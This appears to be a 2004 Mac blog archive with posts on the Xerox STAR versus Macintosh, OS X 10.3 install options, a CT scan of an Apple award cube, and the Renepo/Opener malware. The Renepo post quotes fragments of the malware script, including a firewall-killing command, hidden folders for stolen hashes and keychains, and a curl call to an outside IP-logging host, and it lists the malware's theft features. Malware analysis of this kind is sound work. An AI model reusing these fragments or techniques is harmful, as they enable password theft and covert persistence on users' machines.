In pursuit of textual glory

Month: November, 2004

Xerox Star and Macintosh

Courtesy : http://library.stanford.edu/mac/index.html

Source: Paul Danish, “A Tribute to Apple’s STAR Marketing, ” Club Mac News (November 1984), 49-51.
Location: M1007, Apple Computer Inc. Papers, Series 12, Box 18, Folder 16.

Whoever set the show up managed to put the Xerox display right next to Apple’s. That turned out to be an inspired choice, since Xerox was showing the STAR (or the 8010 Information System as Big Gray’s marketing department enthusiastically refers to it), the system which pioneered the Lisa and Macintosh way of doing things.

The STAR (Xerox no longer uses the name in its product literature because a startup company got to it first) was born at Xerox’s Palo Alto Research Center (PARC), the inspiration of some of the most original computer people ever assembled under one roof. Given a great deal of latitude and generous funding, they developed a personal computing system that contains all the major elements found in the Lisa/Mac environment, including program integration (with the ability to combine text, tables, and graphics in the same document), pull-down menus, icons, mouse control, a high resolution, bit-mapped display, and a laser printer.

Indeed, Apple licensed STAR technology for use in Lisa and presumably in Mac. Exactly how much STAR is in Mac isn’t entirely clear, but it is obviously not an insubstantial amount.

The STAR was designed for the Serious Business User. It came with high quality, bundled software that could Do Something, and it came to the market in 1981, well before the IBM PC. At the time, Xerox had a reputation as a leading edge company while IBM was widely considered to have lost its touch.

If Xerox had played its cards right, it might have set the standard for Serious Business Personal Computers. In fact, if Xerox has sold more than 10,000 machines it would be surprising. What happened?

For starters, the STAR concept was conceived at a time when the only hardware powerful enough was in the minicomputer class. The system is in effect a personal minicomputer instead of a personal microcomputer, and that means it embodies most of the minicomputer industry’s bad habits.

From the perspective of the personal user, it’s badly over-priced. Xerox is presently asking $9,995 for a base system. [and] is designed to work with a laser printer that costs $38,000. That means the system is well beyond the price of individual users and small businesses.

Everything about the STAR is proprietary and closed, which means no clones– and no third party software. This is particularly astonishing in that the real power of STAR-Lisa-Macintosh technology lies in the fact that the operating environment makes it insanely easy for the user to learn new programs, so easy in fact that it makes sense for the owner of such a machine to buy software that will only be used occasionally. Xerox appears to have totally overlooked this capability, which promises a quantum jump in the usefulness of personal computers, not to mention the market for applications packages.

A measure of how closed the system is lies in the fact that Xerox does not even call it a personal computer, preferring instead the term “personal workstation.” In fact the distinction is more than semantic, since Xerox hasn’t bothered to provide the tools that allow the user to do any independent programming.

[p. 50] Xerox spokesmen maintain the STAR was never intended to be aimed at the personal computer market, and that is plausible considering the state of the art in hardware at the time it was developed. The STAR is a 16-bit machine with anywhere from 768K to 1.5 megabytes of memory and a 10-megabyte hard disk, which in 1981 put it a generation ahead of the 8-bit personal computers of the time.

What is not plausible, what is in fact incredible, is that Xerox did nothing to adapt STAR technology to a personal computer. It still maintains it is only interested in the Fortune 500 market.

At the show the STAR was being demonstrated by a woman who knew the system cold. During the 20 minutes I watched she had one interested prospect. Over at the Apple display a guy was demoing Mac packages for The Rest of Us as fast as he could call them up from a hard disk. I got the feeling he had gotten a cram course in most of them the week before. But even at the sparsely-attended show he usually had at least a dozen onlookers.

From the beginning, Apple’s marketing instincts have been good– the Apple II succeeded as much because it was an open system as because it was technologically innovative. It was largely that openness that allowed Apple to beat Tandy in round one of the personal computer wars.

When Apple initially introduced Lisa, however, it brought in a good deal of Xerox’s marketing philosophy, and as a consequence it had a brush with disaster. Macintosh represented a giant step back towards the company’s original roots, which are openness and access as much as they are innovation.

[p. 51] What outrages me is that Xerox took a technology that was so manifestly designed to make the computer accessible and– whether out of short-sightedness or out of greed– marketed it in a way all but guaranteed to make it shrivel and wither.

Steve Jobs says it’s more fun to be a pirate than to join the Navy. Sometimes it’s a far nobler thing to do as well.

Document created on 4 April 2000;
This version published on Wed May 07 2003 19:01:42

Install options in 10.3

“Clean install” is not a Panther (Mac OS X 10.3) installation option, or an option to any version of X. If you hear people say “Clean Install” about Mac OS X, please correct them as that is not the term Apple uses for Mac OS X installation.

Clean install is what you do to Mac OS 8 and 9 (8.0, 8.1, 8.5, 8.6, 9.0 – 9.2.1) when you create a fresh System Folder, and rename the old one Previous System Folder and have to manually move Preferences, control panels, and extensions over to the new system folder from your old application installations.

In Mac OS X, you have four installation options, one of which is like a Clean Install but goes under a different name. There is:

1. Erase and install – erases the hard drive and installs a fresh copy of the operating system. This had previously caused trouble because of a bug in 10.3 that has caused some Firewire hard drives to become unreadable after installation of 10.3. Unless of course you have two copies external of your internal hard drive of every critical file and know how to access them easily, erase and install will only leave you with the backup of your data, assuming the backup is accessible after the installation of the system. The problem has been narrowed down to Oxford 922 and 911 drives and Apple has rectified this problem.

2. Restore system – restores the operating system and any applications that came with the Mac.

3. Archive and Install – first appeared under retail 10.2 CDs, now available under both 10.3 update CDs (the $20 variety) and 10.3 retail CDs. This gives you the option to create a new system folder, while renaming the old, and save user and network preferences. If you don’t save user and network preferences, your installed applications that are non-Apple, and your Users folder get moved to the Previous System folder along with the previous operating system. This is the one most like the Mac OS 8 and 9 Clean Install option, but it is not called that by Apple. This is the currently recommended way to install a new operating system to make sure you preserve your data. Archive and Install may leave behind newer applications than will run with the operating system if you Archive and Install 10.2 over 10.3. It is recommended you move Apple programs replaced by Archive and Install out of the Applications folder before you Archive and Install 10.2 over 10.3.

4. Upgrade Install – Available on upgrade disks of all versions, as well as retail disks. This will simply upgrade an existing X system to a new one, not concerning itself if any old system preferencees are incompatible with the new system. This is usually not the recommended option because of its lack of sensitivity to the possibility an old system may not have compatible parts. It is however, also the installation which happens if you select no installation option. As such, it is recommended you only do this if you have no non-Apple applications installed, and all your Apple applications are up to date.

Look Inside..

The Apple Design Award.

The Apple Design Award is the ultimate encouragement for every mac developer, not only for the recognition that it brings but also because it gives them a chance to behold a masterpiece of Apple engineering. I came across the website of Mek & Tosj, who true to their scientific spirit took a look inside the Apple Design Award!

They are students at the Netherlands Cancer Institute and are involved in stuff such as the application of biophysical techniques to study cellular processes inside living cells, drug resistance and antigen presentation.

They are avowed mac users who have an interesting story behind their nick names namely Mek & Tosj. Here goes in their own words:

“In fact, one day while entering the seminar room, our own boss Sjaak said: “Hey, there you have Mek en Tosj” (the latter being the dutch pronunciation for Mac and Tosh). From that day one we decided to keep our new nicknames, even though today almost half the people on our floor are Mac users ;-)”

On June 29th they won the Apple Design Award in the category “Best Student Mac OS X Project” for their program 4Peaks. With the prize came a beautiful metal cube as trophy that glowed when it was touched!!. Curious to know how the cube glowed when it was touched they set out to answer the question in a typically scientific manner. To look inside and find how it worked. How did the cube notice that it was touched? Opening it up would be a simple solution of course, but they were afraid to break it. Still, curious as scientists can be, here is what they thought of doing:

“we thought of something more elegant to answer the burning questions. We contacted the people of the radiotherapy department in the hospital to see if they perhaps could take an X-ray of the cube and reveal its inner being, just like people had previously done with a Titanium PowerBook and iPod. Unfortunately they told us that they did not have an X-ray machine, we should contact the radio-diagnostic department for that. Instead however, they did have something else: a cone beam CT scan that would even allow 3D reconstruction!”

The Cube was placed in the hospitals CT scanner and scanned to come up with some really interesting results.Above is the reconstructed image from all the scanned slices! Taking the actual scan only required one 360° gantry rotation of the machine, and took no more than three minutes in which 600 X-ray images were recorded at a resolution of 512×512 pixels . Next, these images were used to reconstruct the cube in 3D with a resolution of about 1mm cubic voxel size. With help of OsiriX, the open source medical image package the data was processed to show what was inside Apple’s Design Award.

“The cube is again a classical example of true Apple design, with eye for detail and beautiful not only outside, but inside as well. Made out of one piece of solid metal, it is not difficult to see why the cube feels relatively heavy. The scan reveals a cylindrical cavity, drilled from below to just under the Apple logo. The bottom of the central cavity is separated from the battery compartment by a circuitry board containing surprisingly many electronic parts. Also from this logic board protrude to Light Emitting Diodes (LEDs) that form the light source from the cube. The fact that these are placed relatively towards the bottom of the cube in combination with a plastic diffusion filter right below the Apple logo, gives the cube it distinct glow.”

The researchers were surprised to find that the Cube was actually powered by 4 alkaline batteries!

But what was most interesting was how it worked. As explained by Mek & Tosj :

“Finally, the question with which it all began, how does it work? The CT scan shows that the bottom plate is electronically isolated from the rest of the cube. The potential difference between the bottom and the sides of the cube is measured by a probe in the bottom plate that is wired to the logic board. The cube notices the touch of a hand by sensing an electric contact between its sides and the bottom plate via the person touching it, a loop closed by the earth.”

The Apple Design Award is an ode to the compay that strives to make great products through great industrial design. Congratulations Mek & Tosj!

See it all here.


Renepo worm targets Mac OS X users, Sophos reports – Sophos

Security experts have discovered a worm that targets Apple’s Mac OS X , disguising itself as a shell script. There are currently no reports of the virus in the wild, but experts are concerned that if it spreads, its effects could be serious. –
The Mac Observer

Mac users run scared of Renepo – Contractor UK

I came across quite a few of these reports over the past few days that I decided to do some reading myself. I was pleasantly surprised with what I found that I decided to post it on my blog so that others have access to one place for all opener-ware!!

CURRENT VERSION : 2.3.8 as on 12 August 2004.


Renepo/Opener started life as an OS X startup item with a shell script to replace the current hostconfig file with a different copy (which has sharing turned on among other things.) It also copies a few files and the netinfo directory into the Public folder of every user folder. On the first reboot SMB sharing will be turned on and the information copied to the .info folder will contain the Mac password hashes and the SMB hashes which are easier to crack. Mr Dimbulb a senior member of the forum, who also happens to be the primary author introduces his work as follows

# opener – a startup script to turn on services and gather user info & hashes for Mac OS X

# This script is written for bash (as is noted by the very first line of this script)

To explain that to the rest of us, for what a bash shell script means please read on:

There are several shell script languages. In Mac OS X, the most common shell script is BASH. The default Terminal shell language is TCSH in 10.1 and 10.2, and BASH in 10.3. You should set the Terminal to use the same language you are going to script in so that you have experience using that shell and know exactly how a command will behave. Most shell scripts are written using /bin/sh, so you should change the command line to /bin/sh by just typing /bin/sh. You can write shell scripts in any language.

Also courtesy oreilly.com
OS X provides several mechanisms for running programs based on events in the login and startup process. Among these mechanisms are StartupItems, LoginItems, and shell startup scripts (used when you start up Terminal or X11). Each of these mechanisms is powerful in its own right, but they each have certain specific uses


# Additional code: hard-mac, JawnDoh!, Dr_Springfield, gapple
# Additional ideas and advice: Zo, BSDOSX


The authors have not stated any purpose as to why they developed this particular worm/malware/virus/script but I could glean from their arguments and counter arguments to queries from some members that, ulterior motives were last on their list. It seems to be more of a fun way of learning. As I quote “hacking and cracking just happen to put a little fun into the learning which can be incredibly dull otherwise. i don’t see how any of what the people (we’re not all kids either) at this forum have written constitutes “causing trouble for everyone” as nothing i have seen here can actually do anything on it’s own… this script for instance, is not a virus and can not get onto your computer all by itself, someone would have to put it there or trick you into putting it there yourself.” – Scriptkitten.

Also the senior members at the forum seem more level headed and responsible type than most hacker/cracker/virus writer. For instance, a one member says “What is wrong with us? Nothing.
Just don’t take your security for granted. Open a door, and we’ll walk it. All you have to do is keep your doors closed, or watch who’s walking around outside.”


One of the wonderful features of the script is that it actually tells everyone what it does. For example, take a look at the first few lines.
# opener 2.3.8 – a startup script to turn on services and gather user info & hashes for Mac OS X
# To install this script you need admin access or
# physical access (boot from a CD or firewire/usb, ignore permissions on the internal drive) or
# write access to either /Library/StartupItems /System/Library/StartupItems or
# write access to any existing StartupItem (which you can then replace with this script) or
# write access to the rc, crontab, or periodic files (and have them run or install the script) or
# you could trick someone who has an admin account into installing it.

Most of the code in the script seems to have a tag that explains what it does. This seems to be more so as the final script was not written by one person with the intention to take down the mac using world at one go but is the painstaking effort of a host of hobbyists who have developed it over a while and have included these little notes to further explain what the code does to those not familiar with it.But I could be wrong.

A few further examples;
# Install this script properly, turn on some services, turn off some (like the firewall)
# if we aren’t already in /System/Library/StartupItems then create a folder with the name of this
# script, copy the script into that folder and also create a StartupParameters.plist file
# If this script is executed it makes itself a StartupItem.


# gather system-wide info like hashes and preferences
# create a hidden folder called .info and some other folders
mkdir -p /.info/private/var /.info/keychains /Library/Preferences/.indexed
mkdir /.info/Library/Application\ Support/ /.info/nistuff /.info/Applications /.info/KRec_Logs
mkdir -p /.info/System/Library/CoreServices /.info/vm /.info/dsniff /.info/Library/WebServer
mkdir /.info/Library/Preferences/Netopia /Library/Preferences/jtr

First reported on Oct. 22, 2004 in Macintouch as, I quote,

MacInTouch Reader
“ There’s now a real [malware program] out there for Mac OS X that can do some real damage. It doesn’t seem to be too destructive although it does delete some UNIX commands and modifies prefs for a couple of others. It will gather all password info on your machine. For now, lets call it “Opener.”

My system was a responding a bit slowly and a check of my /var/log files showed that they were _all_ empty and had the same mod date. The Activity Monitor showed a process called “john” eating almost an entire processor.

Some further looking showed an unknown startupitem in /Library/StartupItems/ called “opener”. The executable file is a well-commented bash program. It scans for passwords for every user, processes the hashed info using your own Mac, turns on file sharing, and puts all this stuff into an invisible folder called .info on each users Public folder.”

It is an amazing piece of coding that shows that the makers are indeed creative. For instance the fact that it uses /Library/StartupItems/, a directory that runs items as root prior to login, and even better, an admin user can create files in here that will run as root!! Indeed on reading the forum one comes across a similar discussion wherein the creators of the script were having trouble running it without using sudo. The answer – a start up item.

One of the specialities of the script seem to be password harvesting and cracking them using brute force with John the Ripper. The hashes are stored in ~/Public as invisible files where they are accessible to programs like windows file sharing, AFP or SMB.

Here is how they log the computers IP addresss which is best described using words from the script itself;
# Grab the public and private IP addresses (we need a routine to post, mail or something with these…)
# The line below will ‘visit’ web page that logs the IP address
# The log of ips that have visited is at http://www.antiorario.it/stats/visitors.php
# Viewing the log does not add your ip to the log but you should still proxy!
killall -m LittleSnitch # LittleSnitch will relaunch but hopefully we will sneak by if it is running
#curl http://www.antiorario.net/stelledimari/index.php > /dev/null

Here is brief summary of what it does;

• Opener tries to install ohphoneX, a teleconferencing program
• It kills LittleSnitch before every Internet connection it makes
• It installs a keystroke recorder
• Allows backdoor access in case someone deletes the hidden account
• Grabs the open-firmware password
• Installs OSXvnc
• Grabs your office 2004 PID (serial number), as well as serial numbers for Mac OS XServer, adobe registrations, VirtualPC 6, Final Cut Pro, LittleSnitch, Apple Pro Apps, your DynDNS account, Timbuk2, and webserver users to name a few.
• It tries to decrypts all the MD5 encrypted user passwords
• Decrypts all users keychains.
• Grabs your AIM logs, and other settings and preferences
• Grabs stuff from your Classic preferences
• Changes your Limewire settings to max out your upload and files.
• The hidden user account is called LDAP-daemon instead of the name hacker used in earlier versions. Looks more innocent than hacker.
• Changes daily cron task try to get your password from the virtual memory swapfile
• It installs an app called John The Ripper – a password cracker that uses a dictionary method to crack passwords
• installs dsniff to sniff for passwords.

All this in the current version, until updated!!


“From what I hear I suspect that opener wont run( on OS 10.4 ), similiar to OSX Server which doesn’t like to run anything in the /Library/StartupItems folder. I suspect we’ll have to switch over to /System/Library/StartupItems/ which is not as easy to write to all the time…” – gapple.

Reassuring though it is that this particular script installation dictates that somebody have access to your computer, it is always a worry if somebody can make it a payload in future programs. Much has been said about the invulnerability of the macintosh operating sytstem, especially touting its unix underpinnings and the fact that it comes with most compromising features turned off by default. But it has to be said that vulnerabilities are patched after somebody has found a way to exploit them. Anyone using mac OS X has probably seen the quintessential dialog box that asks for your admin password allowing the installer to install the app which otherwise would not have been possible as a result of restrictive privileges, and this particular arrangement is, as I see, a grey area . I suppose somebody could make a trojan that pops up a little dialog box asking for your password and thus delivering a deadly payload, but I could be wrong here. Solutions to this problem have been windows style key stroke combinations aka Ctrl-Alt-Del to be pressed along with typing the password. Whether these are practical, feasible, and in keeping with the ease of use mantra of the mac OS is debatable. At the end of the day opener or no opener certain things have changed and some rules have become even more relevant as a result.

As Mr David E. Frank at Macintouch explains,

the best thing we as users can do to protect ourselves from this type of malware is: protect your admin accounts!
• DON’T log in with an admin account to do day-to-day tasks that do not require admin access.
• DON’T read email will logged in as an admin.
• DON’T execute email attachments whose source you are unsure of.

Some additional steps you can take to protect yourself:
• If you have an always-on internet connection, use a firewall.
• Use an encrypted disk image to secure sensitive data, or use FileVault.
• Keep good backups.
• Watch for security updates from Apple.

Kindly leave comments regarding any part of this write up which you feel is wrong or needs to be amended.